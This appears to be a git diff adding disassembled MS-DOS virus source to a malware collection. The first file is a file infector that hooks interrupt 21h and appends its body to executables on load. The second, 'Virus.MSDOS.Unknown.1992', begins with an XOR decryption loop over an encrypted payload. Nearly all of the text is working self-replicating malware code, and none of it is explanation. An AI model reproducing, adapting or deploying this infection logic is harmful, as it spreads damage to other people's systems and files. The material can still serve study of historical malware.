loc_25 ; Jump if equal + cmp ah,21h ; '!' + je loc_25 ; Jump if equal + cmp ah,27h ; ''' + je loc_25 ; Jump if equal + jmp loc_35 ; (03DE) +loc_25: + call sub_15 ; (081F) + jnc loc_27 ; Jump if carry=0 +loc_26: + pop bp + mov al,1 + iret ; Interrupt return +loc_27: + jnz loc_23 ; Jump if not zero + call sub_24 ; (0884) + call sub_14 ; (0814) + cmp ah,14h + jne loc_28 ; Jump if not equal + mov ax,[si+0Ch] + mov dx,80h + mul dx ; dx:ax = reg * ax + xor bx,bx ; Zero register + add al,[si+20h] + adc ah,bl + adc bx,dx + xchg ax,bx + jmp short loc_29 ; (038F) +loc_28: + mov ax,[si+23h] + mov bx,[si+21h] +loc_29: + mov cx,[si+0Eh] + mul cx ; dx:ax = reg * ax + jnc loc_31 ; Jump if carry=0 +loc_30: + call sub_25 ; (0896) + jmp short loc_26 ; (0364) +loc_31: + xchg ax,bx + mul cx ; dx:ax = reg * ax + add dx,bx + jc loc_30 ; Jump if carry Set + mov cs:data_37,ax ; (8344:08D0=0) + mov cs:data_38,dx ; (8344:08D2=0) + mov cs:data_39,cx ; (8344:08D4=0) + call sub_25 ; (0896) + call sub_22 ; (0875) + or al,al ; Zero ? + jz loc_32 ; Jump if zero + cmp al,3 + jne loc_34 ; Jump if not equal +loc_32: + call sub_24 ; (0884) + cmp ah,27h ; ''' + mov ax,cs:data_39 ; (8344:08D4=0) + jnz loc_33 ; Jump if not zero + mul cx ; dx:ax = reg * ax + jc loc_30 ; Jump if carry Set +loc_33: + push ax + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov di,bx + pop ax + call sub_11 ; (0785) + call sub_25 ; (0896) +loc_34: + pop bp + iret ; Interrupt return +loc_35: + cmp ax,4B00h + je loc_38 ; Jump if equal + cmp ax,4B01h + je loc_36 ; Jump if equal + jmp loc_23 ; (0342) +loc_36: + call sub_2 ; (042F) + jc loc_37 ; Jump if carry Set + push si + push di + push ds + push cs + pop ds + mov si,offset data_41 ; (8344:08E2=0) + lea di,[bx+0Eh] ; Load effective addr + cld ; Clear direction + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + pop ds + pop di + pop si +loc_37: + pushf ; Push flags + shr byte ptr [bp+6],1 ; Shift w/zeros fill + popf ; Pop flags + rcl byte ptr [bp+6],1 ; Rotate thru carry + pop bp + iret ; Interrupt return +loc_38: + call sub_2 ; (042F) + jc loc_37 ; Jump if carry Set + push ax + mov ah,51h ; 'Q' + int 21h ; DOS Services ah=function 51h + ; get active PSP segment in bx + mov ds,bx + mov es,bx + pop ax + cli ; Disable interrupts + mov sp,cs:data_41 ; (8344:08E2=0) + mov ss,cs:data_42 ; (8344:08E4=0) + inc sp + inc sp + sti ; Enable interrupts + jmp dword ptr cs:data_43 ; (8344:08E6=0) + +; +; SUBROUTINE +; + +sub_2 proc near + call sub_24 ; (0884) + stc ; Set carry flag + call sub_4 ; (051A) +loc_39: + mov ax,0Bh + jc loc_40 ; Jump if carry Set + cld ; Clear direction + pushf ; Push flags + push ds + mov ax,3522h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov cs:data_24,bx ; (8344:08B7=0) + mov word ptr cs:data_24+2,es ; (8344:08B9=8344h) + lds si,dword ptr [bp+0Ah] ; Load 32 bit ptr + push cs + pop es + mov di,offset data_39 ; (8344:08D4=0) + mov bx,di + mov cx,7 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + pop ds + call sub_16 ; (084C) + push dx + mov ax,4B01h + call sub_23 ; (0879) + pop dx + call sub_17 ; (0851) + jnc loc_42 ; Jump if carry=0 +loc_40: + mov [bp+8],ax +loc_41: + call sub_25 ; (0896) + retn +loc_42: + mov [bp+8],ax + mov ah,51h ; 'Q' + int 21h ; DOS Services ah=function 51h + ; get active PSP segment in bx + mov es,bx + mov si,[bp] + lds dx,dword ptr ss:[si+2] ; Load 32 bit ptr + mov es:data_11e,dx ; (08D4:000A=2F9h) + mov es:data_12e,ds ; (08D4:000C=3872h) + mov ax,2522h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + popf ; Pop flags + jnz loc_41 ; Jump if not zero + push cs + pop ds + mov si,data_51e ; (8344:0904=44h) + mov di,data_13e ; (08D4:0100=0DFh) + mov cx,7ABh + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + call sub_7 ; (0758) + jz loc_44 ; Jump if zero +loc_43: + clc ; Clear carry flag + jmp short loc_41 ; (0470) +loc_44: + mov di,bx + add di,10h + mov ax,ds:data_55e ; (8344:10B1=0) + mov word ptr data_43,ax ; (8344:08E6=0) + mov ax,ds:data_56e ; (8344:10B3=0) + add ax,di + mov word ptr data_43+2,ax ; (8344:08E8=0) + mov cx,ds:data_54e ; (8344:10AF=0) + or cx,cx ; Zero ? + jz loc_43 ; Jump if zero + lds dx,dword ptr [bp+0Eh] ; Load 32 bit ptr + call sub_18 ; (0862) + jc loc_47 ; Jump if carry Set + mov bx,ax + push cx + push cs + pop ds + xor cx,cx ; Zero register + mov dx,ds:data_50e ; (8344:0902=0) + call sub_20 ; (086B) + mov dx,904h + pop cx + +locloop_45: + push cx + mov cx,4 + call sub_8 ; (0764) + pop cx + jc loc_46 ; Jump if carry Set + mov si,dx + push ds + mov ax,[si+2] + mov si,[si] + add ax,di + mov ds,ax + add [si],di + pop ds + loop locloop_45 ; Loop if cx > 0 + + call sub_19 ; (0867) + jmp short loc_43 ; (04A8) +loc_46: + call sub_19 ; (0867) +loc_47: + push es + pop ds + les bx,dword ptr cs:data_24 ; (8344:08B7=0) Load 32 bit ptr + mov ds:data_17e,bx ; (8344:000A=0) + mov ds:data_18e,es ; (8344:000E=8344h) + call sub_13 ; (07EC) + stc ; Set carry flag + jmp loc_39 ; (0436) +sub_2 endp + + +; +; SUBROUTINE +; + +sub_3 proc near + clc ; Clear carry flag + +; External Entry into Subroutine + +sub_4: + push ax + push bx + pushf ; Push flags + call sub_18 ; (0862) + jc loc_48 ; Jump if carry Set + mov bx,ax + popf ; Pop flags + pushf ; Push flags + call sub_6 ; (0533) + pushf ; Push flags + call sub_19 ; (0867) + popf ; Pop flags +loc_48: + pop bx + pop bx + pop ax + retn +sub_3 endp + + +; +; SUBROUTINE +; + +sub_5 proc near + clc ; Clear carry flag + +; External Entry into Subroutine + +sub_6: + cld ; Clear direction + call sub_24 ; (0884) + pushf ; Push flags + push bx + mov ax,1220h + int 2Fh ; ??INT Non-standard interrupt. + jc loc_49 ; Jump if carry Set + xor bh,bh ; Zero register + mov bl,es:[di] + mov ax,1216h + int 2Fh ; ??INT Non-standard interrupt. + jnc loc_50 ; Jump if carry=0 +loc_49: + call sub_25 ; (0896) + retn +loc_50: + push es + push cs + pop ds + mov ax,3523h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov data_26,bx ; (8344:08BB=0) + mov word ptr data_26+2,es ; (8344:08BD=8344h) + inc ax + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov data_28,bx ; (8344:08BF=0) + mov word ptr data_28+2,es ; (8344:08C1=8344h) + mov ah,25h ; '%' + mov dx,offset int_24h_entry + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + dec ax + inc dx + inc dx + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop es + pop bx + mov al,2 + xchg al,es:[di+2] + mov data_33,al ; (8344:08C9=0) + mov ax,es:[di+5] + mov data_34,ax ; (8344:08CA=0) + mov ax,es:[di+15h] + mov data_37,ax ; (8344:08D0=0) + mov ax,es:[di+17h] + mov data_38,ax ; (8344:08D2=0) + mov ax,es:[di+11h] + mov dx,es:[di+13h] + mov data_35,ax ; (8344:08CC=0) + mov data_36,dx ; (8344:08CE=0) + cmp ax,1Ah + sbb dx,0 + jc loc_55 ; Jump if carry Set + popf ; Pop flags + jc loc_52 ; Jump if carry Set + mov ax,es:[di+28h] + cmp ax,5845h + je loc_51 ; Jump if equal + cmp ax,4F43h + jne loc_55 ; Jump if not equal + mov al,4Dh ; 'M' +loc_51: + cmp al,es:[di+2Ah] + jne loc_55 ; Jump if not equal +loc_52: + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_20 ; (086B) + mov dx,8EAh + mov cl,1Ah + call sub_8 ; (0764) + jc loc_57 ; Jump if carry Set + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_7 ; (0758) + jnz loc_53 ; Jump if not zero + mov ax,data_47 ; (8344:08F2=0) + mov dl,10h + mul dx ; dx:ax = reg * ax + mov cx,dx + mov dx,ax +loc_53: + push cx + push dx + add dx,7ABh + adc cx,0 + cmp cx,data_36 ; (8344:08CE=0) + jne loc_54 ; Jump if not equal + cmp dx,data_35 ; (8344:08CC=0) +loc_54: + pop dx + pop cx + jbe loc_56 ; Jump if below or = +loc_55: + jmp short loc_62 ; (065D) +loc_56: + push cx + push dx + call sub_20 ; (086B) + mov dx,904h + mov cx,7ABh + call sub_8 ; (0764) + jnc loc_58 ; Jump if carry=0 +loc_57: + jmp short loc_60 ; (0656) +loc_58: + push es + push di + push cs + pop es + mov si,data_53e ; (8344:09EF=0) + mov di,offset ds:[1EBh] ; (8344:01EB=1Eh) + mov cx,0C3h + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + pop di + pop es + jnz loc_65 ; Jump if not zero + mov dx,cx + call sub_21 ; (0870) + mov cx,7ADh + mov dx,904h + call sub_7 ; (0758) + jnz loc_59 ; Jump if not zero + add cx,6 +loc_59: + add es:[di+11h],cx + adc word ptr es:[di+13h],0 + call sub_8 ; (0764) + jc loc_60 ; Jump if carry Set + mov si,dx + dec cx + dec cx + call sub_10 ; (0778) + cmp dx,[si] + je loc_61 ; Jump if equal +loc_60: + stc ; Set carry flag + jmp short loc_63 ; (0661) +loc_61: + cmp al,al + jmp short loc_63 ; (0661) +loc_62: + mov al,1 + cmp al,0 +loc_63: + pushf ; Push flags +loc_64: + mov si,offset data_33 ; (8344:08C9=0) + cld ; Clear direction + inc di + inc di + movsb ; Mov [si] to es:[di] + inc di + inc di + movsw ; Mov [si] to es:[di] + add di,0Ah + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + mov ax,2524h + lds dx,dword ptr data_28 ; (8344:08BF=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + dec ax + lds dx,dword ptr cs:data_26 ; (8344:08BB=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + popf ; Pop flags + call sub_25 ; (0896) + retn +loc_65: + test byte ptr es:[di+4],4 + jnz loc_62 ; Jump if not zero + mov ah,0Dh + int 21h ; DOS Services ah=function 0Dh + ; flush disk buffers to disk + push bx + push ds + push es + mov ax,3540h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov data_30,bx ; (8344:08C3=0) + mov word ptr data_30+2,es ; (8344:08C5=8344h) + mov al,13h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov data_22,bx ; (8344:08B3=0) + mov word ptr data_22+2,es ; (8344:08B5=8344h) + mov ah,25h ; '%' + lds dx,data_21 ; (8344:08AF=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov al,40h ; '@' +;* mov dx,offset loc_85 ;* + db 0BAh, 59h,0ECh + mov bx,0F000h + mov ds,bx + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop es + pop ds + pop bx + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_21 ; (0870) + mov cx,7ABh + mov si,904h + call sub_7 ; (0758) + jnz loc_66 ; Jump if not zero + add cx,6 + mov ax,data_46 ; (8344:08F0=0) + mov ds:data_54e,ax ; (8344:10AF=0) + mov ax,data_48 ; (8344:08FE=0) + mov ds:data_55e,ax ; (8344:10B1=0) + mov ax,ds:data_49e ; (8344:0900=0) + mov ds:data_56e,ax ; (8344:10B3=0) +loc_66: + push si + call sub_10 ; (0778) + mov [si],dx + pop dx + inc cx + inc cx + call sub_9 ; (076E) + jc loc_68 ; Jump if carry Set + pop dx + pop cx + call sub_20 ; (086B) + mov dx,100h + mov cx,7ABh + call sub_9 ; (076E) + jc loc_69 ; Jump if carry Set + call sub_7 ; (0758) + jnz loc_67 ; Jump if not zero + xor cx,cx ; Zero register + mov data_46,cx ; (8344:08F0=0) + mov data_48,dx ; (8344:08FE=0) + mov word ptr ds:data_49e,0FFF0h ; (8344:0900=0) + xor dx,dx ; Zero register + call sub_20 ; (086B) + mov dx,8EAh + mov cx,1Ah + call sub_9 ; (076E) + jc loc_69 ; Jump if carry Set +loc_67: + cmp al,al + jmp short loc_70 ; (073C) +loc_68: + mov al,1 + cmp al,0 + jmp short loc_70 ; (073C) +loc_69: + stc ; Set carry flag +loc_70: + pushf ; Push flags + mov ah,0Dh + int 21h ; DOS Services ah=function 0Dh + ; flush disk buffers to disk + push ds + mov ax,2513h + lds dx,dword ptr data_22 ; (8344:08B3=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov al,40h ; '@' + lds dx,dword ptr cs:data_30 ; (8344:08C3=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + jmp loc_64 ; (0662) +sub_5 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + mov ax,data_45 ; (8344:08EA=0) + cmp ax,5A4Dh + je loc_ret_71 ; Jump if equal + cmp ax,4D5Ah + +loc_ret_71: + retn +sub_7 endp + + +; +; SUBROUTINE +; + +sub_8 proc near + mov ah,3Fh ; '?' + call sub_23 ; (0879) + jc loc_ret_72 ; Jump if carry Set + cmp ax,cx + +loc_ret_72: + retn +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near + mov ah,40h ; '@' + call sub_23 ; (0879) + jc loc_ret_73 ; Jump if carry Set + cmp ax,cx + +loc_ret_73: + retn +sub_9 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + push cx + xor dx,dx ; Zero register + +locloop_74: + lodsb ; String [si] to al + add dl,al + adc dh,0 + loop locloop_74 ; Loop if cx > 0 + + pop cx + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_11 proc near + push cs + pop ds + mov si,904h + mov bx,ax + mov cx,7ABh + call sub_7 ; (0758) + jnz loc_75 ; Jump if not zero + mov ax,data_47 ; (8344:08F2=0) + mov dx,10h + mul dx ; dx:ax = reg * ax + push bx + push di + call sub_12 ; (07BF) + pop di + pop bx + mov si,offset data_45 ; (8344:08EA=0) + mov cx,1Ah + mov ax,ds:data_54e ; (8344:10AF=0) + mov data_46,ax ; (8344:08F0=0) + mov ax,ds:data_55e ; (8344:10B1=0) + mov data_48,ax ; (8344:08FE=0) + mov ax,ds:data_56e ; (8344:10B3=0) + mov ds:data_49e,ax ; (8344:0900=0) +loc_75: + xor ax,ax ; Zero register + xor dx,dx ; Zero register + +; External Entry into Subroutine + +sub_12: + sub ax,data_37 ; (8344:08D0=0) + sbb dx,data_38 ; (8344:08D2=0) + jc loc_76 ; Jump if carry Set + jnz loc_ret_79 ; Jump if not zero + sub bx,ax + jbe loc_ret_79 ; Jump if below or = + add di,ax + jmp short loc_77 ; (07E2) +loc_76: + neg ax + adc dx,0 + neg dx + jnz loc_ret_79 ; Jump if not zero + sub cx,ax + jbe loc_ret_79 ; Jump if below or = + add si,ax +loc_77: + cmp cx,bx + jbe loc_78 ; Jump if below or = + mov cx,bx +loc_78: + cld ; Clear direction + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + +loc_ret_79: + retn +sub_11 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + pushf ; Push flags + call sub_24 ; (0884) + mov ah,49h ; 'I' + push ds + pop es + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov ah,49h ; 'I' + mov es,ds:data_8e ; (0046:002C=50h) + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov ah,50h ; 'P' + mov bx,ds:data_7e ; (0046:0016=0) + int 21h ; DOS Services ah=function 50h + ; set active PSP segmnt from bx + mov ax,2522h + lds dx,dword ptr ds:data_6e ; (0046:000A=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + call sub_25 ; (0896) + popf ; Pop flags + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + mov si,dx + cmp byte ptr [si],0FFh + jne loc_ret_80 ; Jump if not equal + add si,7 + +loc_ret_80: + retn +sub_14 endp + + +; +; SUBROUTINE +; + +sub_15 proc near + call sub_24 ; (0884) + call sub_14 ; (0814) + push cs + pop es + mov dx,904h + mov di,dx + cld ; Clear direction + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_81 ; Jump if zero + add al,40h ; '@' + mov ah,3Ah ; ':' + stosw ; Store ax to es:[di] +loc_81: + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + mov al,2Eh ; '.' + stosb ; Store al to es:[di] + movsw ; Mov [si] to es:[di] + movsb ; Mov [si] to es:[di] + xor al,al ; Zero register + stosb ; Store al to es:[di] + push es + pop ds + call sub_3 ; (0519) + call sub_25 ; (0896) + retn +sub_15 endp + + +; +; SUBROUTINE +; + +sub_16 proc near + push ax + mov ax,cs + jmp short loc_82 ; (0854) + +; External Entry into Subroutine + +sub_17: + push ax + xor ax,ax ; Zero register +loc_82: + push bx + push ds + mov bx,cs + dec bx + mov ds,bx + mov ds:data_16e,ax ; (8343:0001=0FFFFh) + pop ds + pop bx + pop ax + retn +sub_16 endp + + +; +; SUBROUTINE +; + +sub_18 proc near + mov ax,3D00h + jmp short loc_83 ; (0879) + +; External Entry into Subroutine + +sub_19: + mov ah,3Eh ; '>' + jmp short loc_83 ; (0879) + +; External Entry into Subroutine + +sub_20: + mov ax,4200h + jmp short loc_83 ; (0879) + +; External Entry into Subroutine + +sub_21: + mov ax,4202h + jmp short loc_83 ; (0879) + +; External Entry into Subroutine + +sub_22: + push word ptr [bp+6] + popf ; Pop flags + +; External Entry into Subroutine + +sub_23: +loc_83: + pushf ; Push flags + cli ; Disable interrupts + call dword ptr cs:data_20 ; (8344:08AB=0) + retn +sub_18 endp + + +; +; +; External Entry Point +; +; + +int_24h_entry proc far + mov al,3 +int_24h_entry endp + + +; +; +; External Entry Point +; +; + +int_23h_entry proc far + iret ; Interrupt return +int_23h_entry endp + + +; +; SUBROUTINE +; + +sub_24 proc near + pop cs:data_32 ; (8344:08C7=0) + push ds + push dx + push es + push bx + push ax + push cx + push si + push di + push bp + mov bp,sp + jmp short loc_84 ; (08A6) + +; External Entry into Subroutine + +sub_25: + pop cs:data_32 ; (8344:08C7=0) + mov sp,bp + pop bp + pop di + pop si + pop cx + pop ax + pop bx + pop es + pop dx + pop ds +loc_84: + jmp word ptr cs:data_32 ; (8344:08C7=0) +data_20 dd 00000h +data_21 dd 00000h +data_22 dw 0, 8344h +data_24 dw 0, 8344h +data_26 dw 0, 8344h +data_28 dw 0, 8344h +data_30 dw 0, 8344h +data_32 dw 0 +data_33 db 0 +data_34 dw 0 +data_35 dw 0 +data_36 dw 0 +data_37 dw 0 +data_38 dw 0 +data_39 dw 0 + db 12 dup (0) +data_41 dw 0 +data_42 dw 0 +data_43 dd 00000h +data_45 dw 0 + db 0, 0, 0, 0 +data_46 dw 0 +data_47 dw 0 + db 10 dup (0) +data_48 dw 0 +sub_24 endp + + +seg_a ends + + + + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.1992.asm b/MSDOS/Virus.MSDOS.Unknown.1992.asm new file mode 100644 index 00000000..f2afc514 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1992.asm @@ -0,0 +1,925 @@ + PAGE ,132 +S00000 SEGMENT BYTE PUBLIC 'code' + ASSUME CS:S00000 + ASSUME SS:S00000 + ASSUME DS:S00000 +H00000 DB 256 DUP(?) +P00100 PROC FAR + ASSUME ES:S00000 +H00100: + JMP SHORT H00104 + DB 90H +H00103 DB 2 +H00104: + CALL P0010A + JMP H006F1 +P0010A PROC NEAR +H0010A: + PUSH CX + MOV BX,0138H +H0010E: + MOV CH,[BX] + XOR CH,H00103 + MOV [BX],CH + INC BX + CMP BX,0900H + JLE H0010E + POP CX + RET +P0010A ENDP + DW 00BAH + DW 8B01H + DW 0E51EH + DW 5306H + DW 0E0E8H + DW 5BFFH + DW 0C8B9H + DW 0B407H + DW 0CD40H + DW 5321H + DW 0D4E8H + DW 5BFFH + DW 0DC3H + DW 1B10H + DW 0800H + DW 1BB1H + DW 0C104H + DW 2218H + DW 0BDC6H + DW 011BH + DW 1BB1H + DW 0B115H + DW 011BH + DW 1B1AH + DW 0C100H + DW 0418H + DW 0DBC6H + DW 0B302H + DW 14B3H + DW 1918H + DW 10B3H + DW 22DFH + DW 0822H + DW 1BB1H + DW 0C101H + DW 0C18H + DW 0C0C6H + DW 0518H + DW 0C3C6H + DW 0BDC6H + DW 2222H + DW 1B1AH + DW 0B100H + DW 061BH + DW 0B302H + DW 14B3H + DW 1D18H + DW 10B3H + DW 22DFH + DW 0C208H + DW 0C6C6H + DW 0C6C0H + DW 1BDBH + DW 0B10CH + DW 0B1BH + DW 22B1H + DW 1A22H + DW 001BH + DW 1BB1H + DW 0201H + DW 0B3B3H + DW 1814H + DW 0B323H + DW 0DF10H + DW 001BH + DW 0B108H + DW 121BH + DW 1BB1H + DW 0C20BH + DW 0C6C6H + DW 1B1AH + DW 0B100H + DW 001BH + DW 0B302H + DW 14B3H + DW 2118H + DW 10B3H + DW 22DFH + DW 1B13H + DW 0B06H + DW 10DCH + DW 1322H + DW 0DC22H + DW 2210H + DW 2213H + DW 10DCH + DW 1322H + DW 0DC22H + DW 2210H + DW 1B13H + DW 0DC06H + DW 2210H + DW 2213H + DW 0DC22H + DW 2210H + DW 1322H + DW 2222H + DW 10DCH + DW 2222H + DW 1B1AH + DW 0800H + DW 22B1H + DW 0222H + DW 0B3B3H + DW 1814H + DW 0B30AH + DW 180DH + DW 0B31AH + DW 1002H + DW 14DFH + DW 0B3B3H + DW 10B3H + DW 13DFH + DW 0B22H + DW 02DCH + DW 1810H + DW 0B306H + DW 2213H + DW 0DC0BH + DW 0DC22H + DW 1002H + DW 0B3B3H + DW 2213H + DW 0DC0BH + DW 1002H + DW 13B3H + DW 0B22H + DW 02DCH + DW 1810H + DW 0B306H + DW 2213H + DW 0DC0BH + DW 0DC22H + DW 0DC22H + DW 0DC22H + DW 1002H + DW 22B3H + DW 1B1AH + DW 0800H + DW 22B1H + DW 0222H + DW 0B3B3H + DW 1814H + DW 0B305H + DW 180DH + DW 0B31BH + DW 1002H + DW 22DFH + DW 1422H + DW 10B3H + DW 13DFH + DW 061BH + DW 0DC0BH + DW 2210H + DW 2213H + DW 0DC22H + DW 1002H + DW 22B3H + DW 1322H + DW 0B22H + DW 02DCH + DW 0B310H + DW 1B13H + DW 0B06H + DW 10DCH + DW 1322H + DW 0DC22H + DW 1002H + DW 13B3H + DW 0B22H + DW 02DCH + DW 0B310H + DW 2213H + DW 0DC0BH + DW 1002H + DW 22B3H + DW 081AH + DW 0C6C6H + DW 0DBC0H + DW 2222H + DW 0B302H + DW 14B3H + DW 0518H + DW 0DB3H + DW 0E18H + DW 12B3H + DW 051BH + DW 1814H + DW 0B301H + DW 1002H + DW 1BDFH + DW 0800H + DW 22B1H + DW 0222H + DW 0B3B3H + DW 13B3H + DW 0B22H + DW 02DCH + DW 0B310H + DW 2213H + DW 0DC0BH + DW 0DC22H + DW 1002H + DW 22B3H + DW 2213H + DW 0DC0BH + DW 1002H + DW 22B3H + DW 0B3B3H + DW 13B3H + DW 0B22H + DW 02DCH + DW 0B310H + DW 2213H + DW 0DC0BH + DW 1002H + DW 22B3H + DW 0B3B3H + DW 2213H + DW 0DC0BH + DW 1002H + DW 22B3H + DW 221AH + DW 0822H + DW 1BB1H + DW 0200H + DW 0B3B3H + DW 1814H + DW 0B305H + DW 180DH + DW 0B30EH + DW 0DC12H + DW 0D9D9H + DW 1402H + DW 0B3B3H + DW 0B0B0H + DW 120DH + DW 14D9H + DW 0B3B3H + DW 02B3H + DW 0DF10H + DW 011BH + DW 0B108H + DW 1322H + DW 061BH + DW 0DC0BH + DW 1002H + DW 13B3H + DW 0B22H + DW 02DCH + DW 0B310H + DW 2213H + DW 0DC0BH + DW 1002H + DW 13B3H + DW 0B22H + DW 02DCH + DW 0B310H + DW 1B13H + DW 0B06H + DW 02DCH + DW 0B310H + DW 2213H + DW 0DC0BH + DW 1002H + DW 1BB3H + DW 1300H + DW 0B22H + DW 02DCH + DW 0B310H + DW 1A22H + DW 2222H + DW 0B108H + DW 001BH + DW 0B302H + DW 14B3H + DW 0518H + DW 0DB3H + DW 0E18H + DW 12B3H + DW 0D9DCH + DW 02D9H + DW 0B314H + DW 0B3B3H + DW 0DB0H + DW 0D912H + DW 0B314H + DW 02B3H + DW 0DF10H + DW 061BH + DW 0B108H + DW 2222H + DW 1802H + DW 0B307H + DW 0B322H + DW 22B3H + DW 0B3B3H + DW 0B322H + DW 22B3H + DW 0718H + DW 22B3H + DW 0B3B3H + DW 001BH + DW 0B3B3H + DW 22B3H + DW 221AH + DW 0822H + DW 1BB1H + DW 0200H + DW 0B3B3H + DW 1814H + DW 0B301H + DW 0B30DH + DW 0B3B3H + DW 0B302H + DW 180DH + DW 0B30EH + DW 0DC12H + DW 0718H + DW 14D9H + DW 0B3B3H + DW 1002H + DW 1BDFH + DW 0801H + DW 0C6D8H + DW 1BDBH + DW 0D818H + DW 0C6C6H + DW 0BDC6H + DW 2222H + DW 221AH + DW 0B122H + DW 011BH + DW 0B302H + DW 14B3H + DW 0B3B3H + DW 0DB3H + DW 1818H + DW 02B3H + DW 0DF10H + DW 001BH + DW 0C108H + DW 0418H + DW 0C0C6H + DW 1618H + DW 0DBC6H + DW 001BH + DW 22B1H + DW 1A22H + DW 2222H + DW 18C1H + DW 0C601H + DW 02BDH + DW 0B3B3H + DW 140DH + DW 1F18H + DW 02B3H + DW 0DF10H + DW 2222H + DW 0B108H + DW 071BH + DW 2216H + DW 140DH + DW 1656H + DB 'jg"ocl"ujm"`pmwejv"{mw"' + DW 2210H + DW 0822H + DW 22B1H + DW 1A22H + DW 2222H + DW 1BB1H + DW 0B101H + DW 0B302H + DW 0DB3H + DW 1814H + DW 0B31EH + DW 1002H + DW 1BDFH + DW 0800H + DW 1BB1H + DW 0201H + DW 0B3B3H + DW 2216H + DB 0DH + DB '400."Qikqo"Mlg."Acrvkcl"' + DW 2210H + DW 0822H + DW 22B1H + DW 1A22H + DW 2222H + DW 1BB1H + DW 0B101H + DW 0B302H + DW 0DB3H + DW 1814H + DW 0B310H + DW 1002H + DW 0DDFH + DW 1814H + DW 0B305H + DW 1002H + DW 1BDFH + DW 0801H + DW 1BB1H + DW 0201H + DW 0B3B3H + DW 2216H + DB 0DH + DB 'Vpkrq."clf"Qw`/Xgpm"lmu"' + DW 2210H + DW 0822H + DW 22B1H + DW 1A22H + DW 2222H + DW 1BB1H + DW 0B101H + DW 0B302H + DW 0DB3H + DW 1814H + DW 0B310H + DW 1002H + DW 1BDFH + DW 0801H + DW 1BB1H + DW 0B105H + DW 011BH + DW 0B302H + DW 16B3H + DW 0D22H + DB 'qjcliq"{mw"ceckl.""ukvj"' + DW 2210H + DW 0822H + DW 0C6C2H + DW 1AC6H + DW 2222H + DW 1BB1H + DW 0B101H + DW 0B302H + DW 0DB3H + DW 1814H + DW 0B310H + DW 1002H + DW 1BDFH + DW 0801H + DW 0C6C2H + DW 0BDC6H + DW 061BH + DW 0C6C1H + DW 22BDH + DW 0222H + DW 0B3B3H + DW 2216H + DB 0DH + DB 'jkq"ncvgqv,,,' + DW 081BH + DW 1B10H + DW 1A06H + DW 2222H + DW 0C208H + DW 0C6C6H + DW 0C6C0H + DW 02C3H + DW 0B3B3H + DW 140DH + DW 1118H + DW 02B3H + DW 0DF10H + DW 071BH + DW 0B108H + DW 061BH + DW 22B1H + DW 22B1H + DW 0222H + DW 1A18H + DW 1BB3H + DW 1A04H + DW 061BH + DW 0B108H + DW 2222H + DW 0B302H + DW 0DB3H + DW 1814H + DW 0B315H + DW 1002H + DW 22DFH + DW 0822H + DW 1BB1H + DW 0B106H + DW 0C222H + DW 1E18H + DW 0BDC6H + DW 011BH + DW 0C61AH + DW 0C0C6H + DW 0C6C6H + DW 22DBH + DW 0222H + DW 0B3B3H + DW 140DH + DW 1418H + DW 02B3H + DW 0DF10H + DW 001BH + DW 0C108H + DW 0C6C6H + DW 0C0C6H + DW 0DBC6H + DW 071BH + DW 2217H + DB 0CH + DB 'Qikqo"3;;0"/"Tkpwq' + DW 0118H + DW 2223H + DW 2210H + DW 0C108H + DW 0118H + DW 1AC6H + DW 2222H + DW 1BB1H + DW 0206H + DW 0B3B3H + DW 140DH + DW 0A18H + DW 02B3H + DW 0DF10H + DW 0A1BH + DW 0D808H + DW 0418H + DW 0DBC6H + DW 001BH + DW 1BB1H + DW 0207H + DW 0B3B3H + DW 1B17H + DW 0D01H + DB 'Egv"c"ncvg"rcqq#' + DW 011BH + DW 2210H + DW 0B108H + DW 011BH + DW 0D81AH + DW 0DBC6H + DW 001BH + DW 0B302H + DW 0DB3H + DW 1811H + DW 0D909H + DW 0D914H + DW 12D9H + DW 10DFH + DW 071BH + DW 0B108H + DW 081BH + DW 1BB1H + DW 0207H + 